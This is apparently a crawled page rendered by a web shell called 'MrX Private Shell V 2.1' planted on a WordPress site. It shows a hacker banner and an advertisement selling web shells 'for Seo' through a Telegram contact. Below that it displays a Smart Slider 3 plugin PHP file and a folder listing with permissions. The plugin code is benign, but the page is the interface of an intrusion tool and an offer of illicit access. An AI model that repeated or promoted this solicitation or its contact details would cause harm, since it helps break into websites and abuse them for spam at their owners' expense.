__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Nextend\SmartSlider3\Application\Admin\Layout;
use Nextend\Framework\View\AbstractBlock;
use Nextend\Framework\View\AbstractLayout;
use Nextend\SmartSlider3\Application\Admin\Layout\Block\Core\AdminIframe\BlockAdminIframe;
class LayoutIframe extends AbstractLayout {
protected $label = '';
/**
* @var AbstractBlock[]
*/
protected $actions = array();
public function render() {
$admin = new BlockAdminIframe($this);
$admin->setLayout($this);
$admin->setLabel($this->label);
$admin->setActions($this->actions);
$admin->display();
}
/**
* @param string $label
*/
public function setLabel($label) {
$this->label = $label;
}
/**
* @param AbstractBlock $block
*/
public function addAction($block) {
$this->actions[] = $block;
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Block | Folder | 0775 |
|
|
| Helper | Folder | 0775 |
|
|
| AbstractLayoutMenu.php | File | 2.13 KB | 0664 |
|
| LayoutDefault.php | File | 1007 B | 0664 |
|
| LayoutDefaultSidebar.php | File | 1.16 KB | 0664 |
|
| LayoutEditor.php | File | 1.55 KB | 0664 |
|
| LayoutEmpty.php | File | 390 B | 0664 |
|
| LayoutError.php | File | 796 B | 0664 |
|
| LayoutIframe.php | File | 881 B | 0664 |
|